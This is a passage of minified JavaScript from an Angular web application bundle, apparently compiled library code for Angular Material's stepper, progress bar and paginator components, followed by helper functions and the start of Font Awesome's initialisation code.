n;Vt(n=Bt())&&(i._stepHeader=n)}},hostAttrs:["role","tablist"],hostVars:11,hostBindings:function(e,i){2&e&&(Rt("aria-orientation",i.orientation),Ct("mat-stepper-horizontal","horizontal"===i.orientation)("mat-stepper-vertical","vertical"===i.orientation)("mat-stepper-label-position-end","horizontal"===i.orientation&&"end"==i.labelPosition)("mat-stepper-label-position-bottom","horizontal"===i.orientation&&"bottom"==i.labelPosition)("mat-stepper-header-position-bottom","bottom"===i.headerPosition))},inputs:{selectedIndex:"selectedIndex",disableRipple:"disableRipple",color:"color",labelPosition:"labelPosition",headerPosition:"headerPosition",animationDuration:"animationDuration"},outputs:{animationDone:"animationDone"},exportAs:["matStepper","matVerticalStepper","matHorizontalStepper"],features:[ki([{provide:ub,useExisting:t}]),ci],decls:5,vars:3,consts:[[3,"ngSwitch"],["class","mat-horizontal-stepper-wrapper",4,"ngSwitchCase"],[4,"ngSwitchCase"],["stepTemplate",""],[1,"mat-horizontal-stepper-wrapper"],[1,"mat-horizontal-stepper-header-container"],[4,"ngFor","ngForOf"],[1,"mat-horizontal-content-container"],["class","mat-horizontal-stepper-content","role","tabpanel",3,"id","mat-horizontal-stepper-content-inactive",4,"ngFor","ngForOf"],[3,"ngTemplateOutlet","ngTemplateOutletContext"],["class","mat-stepper-horizontal-line",4,"ngIf"],[1,"mat-stepper-horizontal-line"],["role","tabpanel",1,"mat-horizontal-stepper-content",3,"id"],[3,"ngTemplateOutlet"],["class","mat-step",4,"ngFor","ngForOf"],[1,"mat-step"],[1,"mat-vertical-content-container"],["role","tabpanel",1,"mat-vertical-stepper-content",3,"id"],[1,"mat-vertical-content"],[3,"tabIndex","id","index","state","label","selected","active","optional","errorMessage","iconOverrides","disableRipple","color","click","keydown"]],template:function(e,i){1&e&&(bt(0,0),ne(1,rye,5,2,"div",1),ne(2,cye,2,1,"ng-container",2),Mt(),ne(3,lye,1,23,"ng-template",null,3,d1)),2&e&&(V("ngSwitch",i.orientation),C(1),V("ngSwitchCase","horizontal"),C(1),V("ngSwitchCase","vertical"))},dependencies:[Zi,Ri,_1,Zf,p1,QV],styles:['.mat-stepper-vertical,.mat-stepper-horizontal{display:block}.mat-horizontal-stepper-header-container{white-space:nowrap;display:flex;align-items:center}.mat-stepper-label-position-bottom .mat-horizontal-stepper-header-container{align-items:flex-start}.mat-stepper-header-position-bottom .mat-horizontal-stepper-header-container{order:1}.mat-stepper-horizontal-line{border-top-width:1px;border-top-style:solid;flex:auto;height:0;margin:0 -16px;min-width:32px}.mat-stepper-label-position-bottom .mat-stepper-horizontal-line{margin:0;min-width:0;position:relative}.mat-stepper-label-position-bottom .mat-horizontal-stepper-header:not(:first-child)::before,[dir=rtl] .mat-stepper-label-position-bottom .mat-horizontal-stepper-header:not(:last-child)::before,.mat-stepper-label-position-bottom .mat-horizontal-stepper-header:not(:last-child)::after,[dir=rtl] .mat-stepper-label-position-bottom .mat-horizontal-stepper-header:not(:first-child)::after{border-top-width:1px;border-top-style:solid;content:"";display:inline-block;height:0;position:absolute;width:calc(50% - 20px)}.mat-horizontal-stepper-header{display:flex;height:72px;overflow:hidden;align-items:center;padding:0 24px}.mat-horizontal-stepper-header .mat-step-icon{margin-right:8px;flex:none}[dir=rtl] .mat-horizontal-stepper-header .mat-step-icon{margin-right:0;margin-left:8px}.mat-stepper-label-position-bottom .mat-horizontal-stepper-header{box-sizing:border-box;flex-direction:column;height:auto}.mat-stepper-label-position-bottom .mat-horizontal-stepper-header:not(:last-child)::after,[dir=rtl] .mat-stepper-label-position-bottom .mat-horizontal-stepper-header:not(:first-child)::after{right:0}.mat-stepper-label-position-bottom .mat-horizontal-stepper-header:not(:first-child)::before,[dir=rtl] .mat-stepper-label-position-bottom .mat-horizontal-stepper-header:not(:last-child)::before{left:0}[dir=rtl] .mat-stepper-label-position-bottom .mat-horizontal-stepper-header:last-child::before,[dir=rtl] .mat-stepper-label-position-bottom .mat-horizontal-stepper-header:first-child::after{display:none}.mat-stepper-label-position-bottom .mat-horizontal-stepper-header .mat-step-icon{margin-right:0;margin-left:0}.mat-stepper-label-position-bottom .mat-horizontal-stepper-header .mat-step-label{padding:16px 0 0 0;text-align:center;width:100%}.mat-vertical-stepper-header{display:flex;align-items:center;height:24px}.mat-vertical-stepper-header .mat-step-icon{margin-right:12px}[dir=rtl] .mat-vertical-stepper-header .mat-step-icon{margin-right:0;margin-left:12px}.mat-horizontal-stepper-wrapper{display:flex;flex-direction:column}.mat-horizontal-stepper-content{outline:0}.mat-horizontal-stepper-content.mat-horizontal-stepper-content-inactive{height:0;overflow:hidden}.mat-horizontal-content-container{overflow:hidden;padding:0 24px 24px 24px}.cdk-high-contrast-active .mat-horizontal-content-container{outline:solid 1px}.mat-stepper-header-position-bottom .mat-horizontal-content-container{padding:24px 24px 0 24px}.mat-vertical-content-container{margin-left:36px;border:0;position:relative}.cdk-high-contrast-active .mat-vertical-content-container{outline:solid 1px}[dir=rtl] .mat-vertical-content-container{margin-left:0;margin-right:36px}.mat-stepper-vertical-line::before{content:"";position:absolute;left:0;border-left-width:1px;border-left-style:solid}[dir=rtl] .mat-stepper-vertical-line::before{left:auto;right:0}.mat-vertical-stepper-content{overflow:hidden;outline:0}.mat-vertical-content{padding:0 24px 24px 24px}.mat-step:last-child .mat-vertical-content-container{border:none}'],encapsulation:2,data:{animation:[XV.horizontalStepTransition,XV.verticalStepTransition]},changeDetection:0}),t})(),pye=(()=>{class t extends BCe{}return t.\u0275fac=function(){let a;return function(i){return(a||(a=ba(t)))(i||t)}}(),t.\u0275dir=Ot({type:t,selectors:[["button","matStepperNext",""]],hostAttrs:[1,"mat-stepper-next"],hostVars:1,hostBindings:function(e,i){2&e&&Gs("type",i.type)},inputs:{type:"type"},features:[ci]}),t})(),_ye=(()=>{class t extends HCe{}return t.\u0275fac=function(){let a;return function(i){return(a||(a=ba(t)))(i||t)}}(),t.\u0275dir=Ot({type:t,selectors:[["button","matStepperPrevious",""]],hostAttrs:[1,"mat-stepper-previous"],hostVars:1,hostBindings:function(e,i){2&e&&Gs("type",i.type)},inputs:{type:"type"},features:[ci]}),t})(),ZV=(()=>{class t{}return t.\u0275fac=function(e){return new(e||t)},t.\u0275mod=yi({type:t}),t.\u0275inj=Ci({providers:[mye,up],imports:[la,rn,yu,hp,UCe,ib,Pd,la]}),t})();const gye=["primaryValueBar"],Cye=kd(class{constructor(t){this._elementRef=t}},"primary"),yye=new ni("mat-progress-bar-location",{providedIn:"root",factory:function bye(){const t=Po(ga),a=t?t.location:null;return{getPathname:()=>a?a.pathname+a.search:""}}}),Mye=new ni("MAT_PROGRESS_BAR_DEFAULT_OPTIONS");let vye=0,hA=(()=>{class t extends Cye{constructor(e,i,n,r,c,d){super(e),this._ngZone=i,this._animationMode=n,this._changeDetectorRef=d,this._isNoopAnimation=!1,this._value=0,this._bufferValue=0,this.animationEnd=new Tt,this._animationEndSubscription=I.EMPTY,this.mode="determinate",this.progressbarId="mat-progress-bar-"+vye++;const T=r?r.getPathname().split("#")[0]:"";this._rectangleFillValue=`url('${T}#${this.progressbarId}')`,this._isNoopAnimation="NoopAnimations"===n,c&&(c.color&&(this.color=this.defaultColor=c.color),this.mode=c.mode||this.mode)}get value(){return this._value}set value(e){var i;this._value=eB(Uo(e)||0),null===(i=this._changeDetectorRef)||void 0===i||i.markForCheck()}get bufferValue(){return this._bufferValue}set bufferValue(e){var i;this._bufferValue=eB(e||0),null===(i=this._changeDetectorRef)||void 0===i||i.markForCheck()}_primaryTransform(){return{transform:`scale3d(${this.value/100}, 1, 1)`}}_bufferTransform(){return"buffer"===this.mode?{transform:`scale3d(${this.bufferValue/100}, 1, 1)`}:null}ngAfterViewInit(){this._ngZone.runOutsideAngular(()=>{const e=this._primaryValueBar.nativeElement;this._animationEndSubscription=Tc(e,"transitionend").pipe(Dn(i=>i.target===e)).subscribe(()=>{0!==this.animationEnd.observers.length&&("determinate"===this.mode||"buffer"===this.mode)&&this._ngZone.run(()=>this.animationEnd.next({value:this.value}))})})}ngOnDestroy(){this._animationEndSubscription.unsubscribe()}}return t.\u0275fac=function(e){return new(e||t)(Ee(mi),Ee(qi),Ee(ir,8),Ee(yye,8),Ee(Mye,8),Ee(Ma))},t.\u0275cmp=Wt({type:t,selectors:[["mat-progress-bar"]],viewQuery:function(e,i){if(1&e&&Mi(gye,5),2&e){let n;Vt(n=Bt())&&(i._primaryValueBar=n.first)}},hostAttrs:["role","progressbar","aria-valuemin","0","aria-valuemax","100","tabindex","-1",1,"mat-progress-bar"],hostVars:4,hostBindings:function(e,i){2&e&&(Rt("aria-valuenow","indeterminate"===i.mode||"query"===i.mode?null:i.value)("mode",i.mode),Ct("_mat-animation-noopable",i._isNoopAnimation))},inputs:{color:"color",value:"value",bufferValue:"bufferValue",mode:"mode"},outputs:{animationEnd:"animationEnd"},exportAs:["matProgressBar"],features:[ci],decls:10,vars:4,consts:[["aria-hidden","true"],["width","100%","height","4","focusable","false",1,"mat-progress-bar-background","mat-progress-bar-element"],["x","4","y","0","width","8","height","4","patternUnits","userSpaceOnUse",3,"id"],["cx","2","cy","2","r","2"],["width","100%","height","100%"],[1,"mat-progress-bar-buffer","mat-progress-bar-element",3,"ngStyle"],[1,"mat-progress-bar-primary","mat-progress-bar-fill","mat-progress-bar-element",3,"ngStyle"],["primaryValueBar",""],[1,"mat-progress-bar-secondary","mat-progress-bar-fill","mat-progress-bar-element"]],template:function(e,i){1&e&&(m(0,"div",0),fi(),m(1,"svg",1)(2,"defs")(3,"pattern",2),it(4,"circle",3),u()(),it(5,"rect",4),u(),ln(),it(6,"div",5)(7,"div",6,7)(9,"div",8),u()),2&e&&(C(3),V("id",i.progressbarId),C(2),Rt("fill",i._rectangleFillValue),C(1),V("ngStyle",i._bufferTransform()),C(1),V("ngStyle",i._primaryTransform()))},dependencies:[Yv],styles:['.mat-progress-bar{display:block;height:4px;overflow:hidden;position:relative;transition:opacity 250ms linear;width:100%}.mat-progress-bar._mat-animation-noopable{transition:none !important;animation:none !important}.mat-progress-bar .mat-progress-bar-element,.mat-progress-bar .mat-progress-bar-fill::after{height:100%;position:absolute;width:100%}.mat-progress-bar .mat-progress-bar-background{width:calc(100% + 10px)}.cdk-high-contrast-active .mat-progress-bar .mat-progress-bar-background{display:none}.mat-progress-bar .mat-progress-bar-buffer{transform-origin:top left;transition:transform 250ms ease}.cdk-high-contrast-active .mat-progress-bar .mat-progress-bar-buffer{border-top:solid 5px;opacity:.5}.mat-progress-bar .mat-progress-bar-secondary{display:none}.mat-progress-bar .mat-progress-bar-fill{animation:none;transform-origin:top left;transition:transform 250ms ease}.cdk-high-contrast-active .mat-progress-bar .mat-progress-bar-fill{border-top:solid 4px}.mat-progress-bar .mat-progress-bar-fill::after{animation:none;content:"";display:inline-block;left:0}.mat-progress-bar[dir=rtl],[dir=rtl] .mat-progress-bar{transform:rotateY(180deg)}.mat-progress-bar[mode=query]{transform:rotateZ(180deg)}.mat-progress-bar[mode=query][dir=rtl],[dir=rtl] .mat-progress-bar[mode=query]{transform:rotateZ(180deg) rotateY(180deg)}.mat-progress-bar[mode=indeterminate] .mat-progress-bar-fill,.mat-progress-bar[mode=query] .mat-progress-bar-fill{transition:none}.mat-progress-bar[mode=indeterminate] .mat-progress-bar-primary,.mat-progress-bar[mode=query] .mat-progress-bar-primary{-webkit-backface-visibility:hidden;backface-visibility:hidden;animation:mat-progress-bar-primary-indeterminate-translate 2000ms infinite linear;left:-145.166611%}.mat-progress-bar[mode=indeterminate] .mat-progress-bar-primary.mat-progress-bar-fill::after,.mat-progress-bar[mode=query] .mat-progress-bar-primary.mat-progress-bar-fill::after{-webkit-backface-visibility:hidden;backface-visibility:hidden;animation:mat-progress-bar-primary-indeterminate-scale 2000ms infinite linear}.mat-progress-bar[mode=indeterminate] .mat-progress-bar-secondary,.mat-progress-bar[mode=query] .mat-progress-bar-secondary{-webkit-backface-visibility:hidden;backface-visibility:hidden;animation:mat-progress-bar-secondary-indeterminate-translate 2000ms infinite linear;left:-54.888891%;display:block}.mat-progress-bar[mode=indeterminate] .mat-progress-bar-secondary.mat-progress-bar-fill::after,.mat-progress-bar[mode=query] .mat-progress-bar-secondary.mat-progress-bar-fill::after{-webkit-backface-visibility:hidden;backface-visibility:hidden;animation:mat-progress-bar-secondary-indeterminate-scale 2000ms infinite linear}.mat-progress-bar[mode=buffer] .mat-progress-bar-background{-webkit-backface-visibility:hidden;backface-visibility:hidden;animation:mat-progress-bar-background-scroll 250ms infinite linear;display:block}.mat-progress-bar._mat-animation-noopable .mat-progress-bar-fill,.mat-progress-bar._mat-animation-noopable .mat-progress-bar-fill::after,.mat-progress-bar._mat-animation-noopable .mat-progress-bar-buffer,.mat-progress-bar._mat-animation-noopable .mat-progress-bar-primary,.mat-progress-bar._mat-animation-noopable .mat-progress-bar-primary.mat-progress-bar-fill::after,.mat-progress-bar._mat-animation-noopable .mat-progress-bar-secondary,.mat-progress-bar._mat-animation-noopable .mat-progress-bar-secondary.mat-progress-bar-fill::after,.mat-progress-bar._mat-animation-noopable .mat-progress-bar-background{animation:none;transition-duration:1ms}@keyframes mat-progress-bar-primary-indeterminate-translate{0%{transform:translateX(0)}20%{animation-timing-function:cubic-bezier(0.5, 0, 0.701732, 0.495819);transform:translateX(0)}59.15%{animation-timing-function:cubic-bezier(0.302435, 0.381352, 0.55, 0.956352);transform:translateX(83.67142%)}100%{transform:translateX(200.611057%)}}@keyframes mat-progress-bar-primary-indeterminate-scale{0%{transform:scaleX(0.08)}36.65%{animation-timing-function:cubic-bezier(0.334731, 0.12482, 0.785844, 1);transform:scaleX(0.08)}69.15%{animation-timing-function:cubic-bezier(0.06, 0.11, 0.6, 1);transform:scaleX(0.661479)}100%{transform:scaleX(0.08)}}@keyframes mat-progress-bar-secondary-indeterminate-translate{0%{animation-timing-function:cubic-bezier(0.15, 0, 0.515058, 0.409685);transform:translateX(0)}25%{animation-timing-function:cubic-bezier(0.31033, 0.284058, 0.8, 0.733712);transform:translateX(37.651913%)}48.35%{animation-timing-function:cubic-bezier(0.4, 0.627035, 0.6, 0.902026);transform:translateX(84.386165%)}100%{transform:translateX(160.277782%)}}@keyframes mat-progress-bar-secondary-indeterminate-scale{0%{animation-timing-function:cubic-bezier(0.15, 0, 0.515058, 0.409685);transform:scaleX(0.08)}19.15%{animation-timing-function:cubic-bezier(0.31033, 0.284058, 0.8, 0.733712);transform:scaleX(0.457104)}44.15%{animation-timing-function:cubic-bezier(0.4, 0.627035, 0.6, 0.902026);transform:scaleX(0.72796)}100%{transform:scaleX(0.08)}}@keyframes mat-progress-bar-background-scroll{to{transform:translateX(-8px)}}'],encapsulation:2,changeDetection:0}),t})();function eB(t,a=0,e=100){return Math.max(a,Math.min(e,t))}let tB=(()=>{class t{}return t.\u0275fac=function(e){return new(e||t)},t.\u0275mod=yi({type:t}),t.\u0275inj=Ci({imports:[rn,la,la]}),t})();function Aye(t,a){if(1&t&&(m(0,"mat-option",19),s(1),u()),2&t){const e=a.$implicit;V("value",e),C(1),ct(" ",e," ")}}function Tye(t,a){if(1&t){const e=Ye();m(0,"mat-form-field",16)(1,"mat-select",17),he("selectionChange",function(n){return be(e),Me(B(2)._changePageSize(n.value))}),ne(2,Aye,2,2,"mat-option",18),u()()}if(2&t){const e=B(2);V("appearance",e._formFieldAppearance)("color",e.color),C(1),V("value",e.pageSize)("disabled",e.disabled)("panelClass",e.selectConfig.panelClass||"")("disableOptionCentering",e.selectConfig.disableOptionCentering)("aria-label",e._intl.itemsPerPageLabel),C(1),V("ngForOf",e._displayedPageSizeOptions)}}function Eye(t,a){if(1&t&&(m(0,"div",20),s(1),u()),2&t){const e=B(2);C(1),ke(e.pageSize)}}function Dye(t,a){if(1&t&&(m(0,"div",12)(1,"div",13),s(2),u(),ne(3,Tye,3,8,"mat-form-field",14),ne(4,Eye,2,1,"div",15),u()),2&t){const e=B();C(2),ct(" ",e._intl.itemsPerPageLabel," "),C(1),V("ngIf",e._displayedPageSizeOptions.length>1),C(1),V("ngIf",e._displayedPageSizeOptions.length<=1)}}function xye(t,a){if(1&t){const e=Ye();m(0,"button",21),he("click",function(){return be(e),Me(B().firstPage())}),fi(),m(1,"svg",7),it(2,"path",22),u()()}if(2&t){const e=B();V("matTooltip",e._intl.firstPageLabel)("matTooltipDisabled",e._previousButtonsDisabled())("matTooltipPosition","above")("disabled",e._previousButtonsDisabled()),Rt("aria-label",e._intl.firstPageLabel)}}function wye(t,a){if(1&t){const e=Ye();fi(),ln(),m(0,"button",23),he("click",function(){return be(e),Me(B().lastPage())}),fi(),m(1,"svg",7),it(2,"path",24),u()()}if(2&t){const e=B();V("matTooltip",e._intl.lastPageLabel)("matTooltipDisabled",e._nextButtonsDisabled())("matTooltipPosition","above")("disabled",e._nextButtonsDisabled()),Rt("aria-label",e._intl.lastPageLabel)}}let q1=(()=>{class t{constructor(){this.changes=new J,this.itemsPerPageLabel="Items per page:",this.nextPageLabel="Next page",this.previousPageLabel="Previous page",this.firstPageLabel="First page",this.lastPageLabel="Last page",this.getRangeLabel=(e,i,n)=>{if(0==n||0==i)return`0 of ${n}`;const r=e*i;return`${r+1} \u2013 ${r<(n=Math.max(n,0))?Math.min(r+i,n):r+i} of ${n}`}}}return t.\u0275fac=function(e){return new(e||t)},t.\u0275prov=hi({token:t,factory:t.\u0275fac,providedIn:"root"}),t})();const Rye={provide:q1,deps:[[new Cc,new Fc,q1]],useFactory:function Iye(t){return t||new q1}},kye=new ni("MAT_PAGINATOR_DEFAULT_OPTIONS"),Pye=Jc(yW(class{}));let Oye=(()=>{class t extends Pye{constructor(e,i,n){if(super(),this._intl=e,this._changeDetectorRef=i,this._pageIndex=0,this._length=0,this._pageSizeOptions=[],this._hidePageSize=!1,this._showFirstLastButtons=!1,this.selectConfig={},this.page=new Tt,this._intlChanges=e.changes.subscribe(()=>this._changeDetectorRef.markForCheck()),n){const{pageSize:r,pageSizeOptions:c,hidePageSize:d,showFirstLastButtons:T}=n;null!=r&&(this._pageSize=r),null!=c&&(this._pageSizeOptions=c),null!=d&&(this._hidePageSize=d),null!=T&&(this._showFirstLastButtons=T)}}get pageIndex(){return this._pageIndex}set pageIndex(e){this._pageIndex=Math.max(Uo(e),0),this._changeDetectorRef.markForCheck()}get length(){return this._length}set length(e){this._length=Uo(e),this._changeDetectorRef.markForCheck()}get pageSize(){return this._pageSize}set pageSize(e){this._pageSize=Math.max(Uo(e),0),this._updateDisplayedPageSizeOptions()}get pageSizeOptions(){return this._pageSizeOptions}set pageSizeOptions(e){this._pageSizeOptions=(e||[]).map(i=>Uo(i)),this._updateDisplayedPageSizeOptions()}get hidePageSize(){return this._hidePageSize}set hidePageSize(e){this._hidePageSize=wi(e)}get showFirstLastButtons(){return this._showFirstLastButtons}set showFirstLastButtons(e){this._showFirstLastButtons=wi(e)}ngOnInit(){this._initialized=!0,this._updateDisplayedPageSizeOptions(),this._markInitialized()}ngOnDestroy(){this._intlChanges.unsubscribe()}nextPage(){if(!this.hasNextPage())return;const e=this.pageIndex;this.pageIndex=this.pageIndex+1,this._emitPageEvent(e)}previousPage(){if(!this.hasPreviousPage())return;const e=this.pageIndex;this.pageIndex=this.pageIndex-1,this._emitPageEvent(e)}firstPage(){if(!this.hasPreviousPage())return;const e=this.pageIndex;this.pageIndex=0,this._emitPageEvent(e)}lastPage(){if(!this.hasNextPage())return;const e=this.pageIndex;this.pageIndex=this.getNumberOfPages()-1,this._emitPageEvent(e)}hasPreviousPage(){return this.pageIndex>=1&&0!=this.pageSize}hasNextPage(){const e=this.getNumberOfPages()-1;return this.pageIndex<e&&0!=this.pageSize}getNumberOfPages(){return this.pageSize?Math.ceil(this.length/this.pageSize):0}_changePageSize(e){const n=this.pageIndex;this.pageIndex=Math.floor(this.pageIndex*this.pageSize/e)||0,this.pageSize=e,this._emitPageEvent(n)}_nextButtonsDisabled(){return this.disabled||!this.hasNextPage()}_previousButtonsDisabled(){return this.disabled||!this.hasPreviousPage()}_updateDisplayedPageSizeOptions(){!this._initialized||(this.pageSize||(this._pageSize=0!=this.pageSizeOptions.length?this.pageSizeOptions[0]:50),this._displayedPageSizeOptions=this.pageSizeOptions.slice(),-1===this._displayedPageSizeOptions.indexOf(this.pageSize)&&this._displayedPageSizeOptions.push(this.pageSize),this._displayedPageSizeOptions.sort((e,i)=>e-i),this._changeDetectorRef.markForCheck())}_emitPageEvent(e){this.page.emit({previousPageIndex:e,pageIndex:this.pageIndex,pageSize:this.pageSize,length:this.length})}}return t.\u0275fac=function(e){pd()},t.\u0275dir=Ot({type:t,inputs:{color:"color",pageIndex:"pageIndex",length:"length",pageSize:"pageSize",pageSizeOptions:"pageSizeOptions",hidePageSize:"hidePageSize",showFirstLastButtons:"showFirstLastButtons",selectConfig:"selectConfig"},outputs:{page:"page"},features:[ci]}),t})(),x8=(()=>{class t extends Oye{constructor(e,i,n){super(e,i,n),n&&null!=n.formFieldAppearance&&(this._formFieldAppearance=n.formFieldAppearance)}}return t.\u0275fac=function(e){return new(e||t)(Ee(q1),Ee(Ma),Ee(kye,8))},t.\u0275cmp=Wt({type:t,selectors:[["mat-paginator"]],hostAttrs:["role","group",1,"mat-paginator"],inputs:{disabled:"disabled"},exportAs:["matPaginator"],features:[ci],decls:14,vars:14,consts:[[1,"mat-paginator-outer-container"],[1,"mat-paginator-container"],["class","mat-paginator-page-size",4,"ngIf"],[1,"mat-paginator-range-actions"],[1,"mat-paginator-range-label"],["mat-icon-button","","type","button","class","mat-paginator-navigation-first",3,"matTooltip","matTooltipDisabled","matTooltipPosition","disabled","click",4,"ngIf"],["mat-icon-button","","type","button",1,"mat-paginator-navigation-previous",3,"matTooltip","matTooltipDisabled","matTooltipPosition","disabled","click"],["viewBox","0 0 24 24","focusable","false",1,"mat-paginator-icon"],["d","M15.41 7.41L14 6l-6 6 6 6 1.41-1.41L10.83 12z"],["mat-icon-button","","type","button",1,"mat-paginator-navigation-next",3,"matTooltip","matTooltipDisabled","matTooltipPosition","disabled","click"],["d","M10 6L8.59 7.41 13.17 12l-4.58 4.59L10 18l6-6z"],["mat-icon-button","","type","button","class","mat-paginator-navigation-last",3,"matTooltip","matTooltipDisabled","matTooltipPosition","disabled","click",4,"ngIf"],[1,"mat-paginator-page-size"],[1,"mat-paginator-page-size-label"],["class","mat-paginator-page-size-select",3,"appearance","color",4,"ngIf"],["class","mat-paginator-page-size-value",4,"ngIf"],[1,"mat-paginator-page-size-select",3,"appearance","color"],[3,"value","disabled","panelClass","disableOptionCentering","aria-label","selectionChange"],[3,"value",4,"ngFor","ngForOf"],[3,"value"],[1,"mat-paginator-page-size-value"],["mat-icon-button","","type","button",1,"mat-paginator-navigation-first",3,"matTooltip","matTooltipDisabled","matTooltipPosition","disabled","click"],["d","M18.41 16.59L13.82 12l4.59-4.59L17 6l-6 6 6 6zM6 6h2v12H6z"],["mat-icon-button","","type","button",1,"mat-paginator-navigation-last",3,"matTooltip","matTooltipDisabled","matTooltipPosition","disabled","click"],["d","M5.59 7.41L10.18 12l-4.59 4.59L7 18l6-6-6-6zM16 6h2v12h-2z"]],template:function(e,i){1&e&&(m(0,"div",0)(1,"div",1),ne(2,Dye,5,3,"div",2),m(3,"div",3)(4,"div",4),s(5),u(),ne(6,xye,3,5,"button",5),m(7,"button",6),he("click",function(){return i.previousPage()}),fi(),m(8,"svg",7),it(9,"path",8),u()(),ln(),m(10,"button",9),he("click",function(){return i.nextPage()}),fi(),m(11,"svg",7),it(12,"path",10),u()(),ne(13,wye,3,5,"button",11),u()()()),2&e&&(C(2),V("ngIf",!i.hidePageSize),C(3),ct(" ",i._intl.getRangeLabel(i.pageIndex,i.pageSize,i.length)," "),C(1),V("ngIf",i.showFirstLastButtons),C(1),V("matTooltip",i._intl.previousPageLabel)("matTooltipDisabled",i._previousButtonsDisabled())("matTooltipPosition","above")("disabled",i._previousButtonsDisabled()),Rt("aria-label",i._intl.previousPageLabel),C(3),V("matTooltip",i._intl.nextPageLabel)("matTooltipDisabled",i._nextButtonsDisabled())("matTooltipPosition","above")("disabled",i._nextButtonsDisabled()),Rt("aria-label",i._intl.nextPageLabel),C(3),V("ngIf",i.showFirstLastButtons))},dependencies:[Zi,Ri,da,nn,Nr,yr,Pa],styles:[".mat-paginator{display:block}.mat-paginator-outer-container{display:flex}.mat-paginator-container{display:flex;align-items:center;justify-content:flex-end;padding:0 8px;flex-wrap:wrap-reverse;width:100%}.mat-paginator-page-size{display:flex;align-items:baseline;margin-right:8px}[dir=rtl] .mat-paginator-page-size{margin-right:0;margin-left:8px}.mat-paginator-page-size-label{margin:0 4px}.mat-paginator-page-size-select{margin:6px 4px 0 4px;width:56px}.mat-paginator-page-size-select.mat-form-field-appearance-outline{width:64px}.mat-paginator-page-size-select.mat-form-field-appearance-fill{width:64px}.mat-paginator-range-label{margin:0 32px 0 24px}.mat-paginator-range-actions{display:flex;align-items:center}.mat-paginator-icon{display:inline-block;width:28px;fill:currentColor}[dir=rtl] .mat-paginator-icon{transform:rotate(180deg)}.cdk-high-contrast-active .mat-paginator-icon{fill:CanvasText}"],encapsulation:2,changeDetection:0}),t})(),iB=(()=>{class t{}return t.\u0275fac=function(e){return new(e||t)},t.\u0275mod=yi({type:t}),t.\u0275inj=Ci({providers:[Rye],imports:[rn,hp,s8,h8,la]}),t})();function aB(t,a){var e=Object.keys(t);if(Object.getOwnPropertySymbols){var i=Object.getOwnPropertySymbols(t);a&&(i=i.filter(function(n){return Object.getOwnPropertyDescriptor(t,n).enumerable})),e.push.apply(e,i)}return e}function ia(t){for(var a=1;a<arguments.length;a++){var e=null!=arguments[a]?arguments[a]:{};a%2?aB(Object(e),!0).forEach(function(i){Ws(t,i,e[i])}):Object.getOwnPropertyDescriptors?Object.defineProperties(t,Object.getOwnPropertyDescriptors(e)):aB(Object(e)).forEach(function(i){Object.defineProperty(t,i,Object.getOwnPropertyDescriptor(e,i))})}return t}function fA(t){return(fA="function"==typeof Symbol&&"symbol"==typeof Symbol.iterator?function(a){return typeof a}:function(a){return a&&"function"==typeof Symbol&&a.constructor===Symbol&&a!==Symbol.prototype?"symbol":typeof a})(t)}function nB(t,a){for(var e=0;e<a.length;e++){var i=a[e];i.enumerable=i.enumerable||!1,i.configurable=!0,"value"in i&&(i.writable=!0),Object.defineProperty(t,i.key,i)}}function Ws(t,a,e){return a in t?Object.defineProperty(t,a,{value:e,enumerable:!0,configurable:!0,writable:!0}):t[a]=e,t}function w8(t,a){return function Fye(t){if(Array.isArray(t))return t}(t)||function Bye(t,a){var e=null==t?null:"undefined"!=typeof Symbol&&t[Symbol.iterator]||t["@@iterator"];if(null!=e){var c,d,i=[],n=!0,r=!1;try{for(e=e.call(t);!(n=(c=e.next()).done)&&(i.push(c.value),!a||i.length!==a);n=!0);}catch(T){r=!0,d=T}finally{try{!n&&null!=e.return&&e.return()}finally{if(r)throw d}}return i}}(t,a)||oB(t,a)||function Uye(){throw new TypeError("Invalid attempt to destructure non-iterable instance.\nIn order to be iterable, non-array objects must have a [Symbol.iterator]() method.")}()}function fb(t){return function Wye(t){if(Array.isArray(t))return I8(t)}(t)||function Vye(t){if("undefined"!=typeof Symbol&&null!=t[Symbol.iterator]||null!=t["@@iterator"])return Array.from(t)}(t)||oB(t)||function Hye(){throw new TypeError("Invalid attempt to spread non-iterable instance.\nIn order to be iterable, non-array objects must have a [Symbol.iterator]() method.")}()}function oB(t,a){if(t){if("string"==typeof t)return I8(t,a);var e=Object.prototype.toString.call(t).slice(8,-1);if("Object"===e&&t.constructor&&(e=t.constructor.name),"Map"===e||"Set"===e)return Array.from(t);if("Arguments"===e||/^(?:Ui|I)nt(?:8|16|32)(?:Clamped)?Array$/.test(e))return I8(t,a)}}function I8(t,a){(null==a||a>t.length)&&(a=t.length);for(var e=0,i=new Array(a);e<a;e++)i[e]=t[e];return i}var rB=function(){},R8={},sB={},cB=null,lB={mark:rB,measure:rB};try{"undefined"!=typeof window&&(R8=window),"undefined"!=typeof document&&(sB=document),"undefined"!=typeof MutationObserver&&(cB=MutationObserver),"undefined"!=typeof performance&&(lB=performance)}catch(t){}var gA,CA,yA,bA,MA,dB=(R8.navigator||{}).userAgent,mB=void 0===dB?"":dB,vp=R8,Mr=sB,uB=cB,_A=lB,Kh=!!Mr.documentElement&&!!Mr.head&&"function"==typeof Mr.addEventListener&&"function"==typeof Mr.createElement,hB=~mB.indexOf("MSIE")||~mB.indexOf("Trident/"),Xh="___FONT_AWESOME___",pB="svg-inline--fa",Ag="data-fa-i2svg",k8="data-fa-pseudo-element",P8="data-prefix",O8="data-icon",_B="fontawesome-i2svg",Qye=["HTML","HEAD","STYLE","SCRIPT"],gB=function(){try{return!0}catch(t){return!1}}(),vr="classic",Qr="sharp",N8=[vr,Qr];function pb(t){return new Proxy(t,{get:function(e,i){return i in e?e[i]:e[vr]}})}var 